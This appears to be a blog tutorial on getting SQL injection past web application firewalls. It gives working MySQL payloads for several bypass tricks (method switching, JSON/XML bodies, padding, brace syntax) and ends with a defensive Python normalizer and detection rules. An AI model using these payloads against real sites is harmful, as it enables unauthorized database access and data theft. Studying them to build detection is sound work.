SQL injection bypass (V)
2022-06-28 02:29:00 【A τθ】
I. order by bypass
When ORDER BY is filtered and the number of columns cannot be determined that way, SELECT ... INTO with user variables can be used instead: the statement only succeeds when the number of variables matches the number of columns.
select * from users where id=1 into @a,@b,@c,@d;

II. HTTP same-parameter request method bypass
1. Principle analysis
When a WAF checks for dangerous characters, it often applies different matching rules to GET and POST requests. If a request is intercepted, switching the request method has a chance of bypassing detection.
For example, the program below accepts the parameter via either GET or POST, but the WAF only matches and intercepts GET and does not intercept POST.
<?php
// $_REQUEST returns the value whether it arrived by GET, POST or cookie
echo $_REQUEST['id'];
?>
Some WAFs, when a request carries both GET and POST data, match only the POST part with priority, which lets the GET part through and leads to a bypass.
2. Practice



III. application/json or text/xml bypass
1. Principle analysis
Some programs submit parameters as JSON, and the back end also receives them as JSON and then splices them into SQL for execution.
Requests in JSON format are usually not intercepted, so the WAF can be bypassed.
text/xml is likewise not intercepted.

IV. Bypass by padding with a large number of characters
1. Principle analysis and practice
A select 0xA expression can be combined with a large volume of padding characters so that the request exceeds the inspected size and gets past some WAF interception.
id=1 and (select 1) and (select 0xA*1000) union select 1,user()-- &submit=1
The same payload as a URL-encoded POST body:
id%3d1+and+(select+1)+and+(select+0xA*1000)+union+select+1,user()--+%26submit%3d1


V. Curly brace bypass
1. Principle analysis
select 1,2 union select {x 1},user();
Inside the braces, the identifier to the left of the value is ignored by MySQL much like a comment, which can help get past some WAF interception.
2. Practice
select * from users where id=1 union select {xxx 1},{yyy 2},{zzz 3},user();
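All five bypasses above exploit a gap between what the WAF inspects and what the application actually consumes: a different parameter source, a different content type, a truncated inspection window, or a syntax wrapper the matcher does not understand. As an added example from the defender's side (not code from the original post), the Python routine below merges GET, form, JSON and XML parameters the way PHP's $_REQUEST does, decodes until the value is stable, strips the {ident expr} wrapper, and applies no length cap before matching. The RULES set and the sample requests are constructed for illustration and are not any real WAF's signatures.

```python
import json
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, unquote_plus

# Constructed signature set covering the constructs in this post; it is not
# any real WAF's rule set. Rules run against the normalized value.
RULES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "select_into_var": re.compile(r"\binto\s+@\w+", re.I),
    "user_func": re.compile(r"\buser\s*\(\s*\)", re.I),
}
# MySQL ODBC escape {ident expr} evaluates to expr; the identifier is noise.
BRACE = re.compile(r"\{\s*\w+\s+([^{}]*)\}")

def extract_params(method, query, content_type, body):
    """Collect parameters from every source the application might read
    (query string, form body, JSON body, XML body), like PHP's $_REQUEST."""
    params = {k: list(v) for k, v in parse_qs(query, keep_blank_values=True).items()}
    extra = {}
    if method == "POST" and body:
        ct = content_type.split(";")[0].strip().lower()
        if ct == "application/x-www-form-urlencoded":
            extra = parse_qs(body, keep_blank_values=True)
        elif ct == "application/json":
            extra = {k: [str(v)] for k, v in json.loads(body).items()}
        elif ct == "text/xml":
            extra = {el.tag: [el.text or ""] for el in ET.fromstring(body)}
    for k, v in extra.items():
        params.setdefault(k, []).extend(v)
    return params

def normalize(value):
    """Canonicalize before matching: decode until stable (catches double
    encoding), strip {ident ...} wrappers, collapse whitespace. There is
    deliberately no length cap, so padding cannot push the payload out of
    the inspected window."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)   # '+' becomes a space too
    value = BRACE.sub(r"\1", value)                 # {xxx 1} -> 1
    return re.sub(r"\s+", " ", value).strip()

def inspect_request(method, query, content_type, body):
    """Return the sorted names of the rules that fire anywhere in the request."""
    hits = set()
    for name, values in extract_params(method, query, content_type, body).items():
        for raw in [name, *values]:       # parameter names can carry payloads too
            norm = normalize(raw)
            hits.update(r for r, pat in RULES.items() if pat.search(norm))
    return sorted(hits)
```

The same inspection is applied regardless of method or content type, so switching from GET to POST, to JSON or XML, padding the request, or wrapping values in braces no longer changes what the matcher sees.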
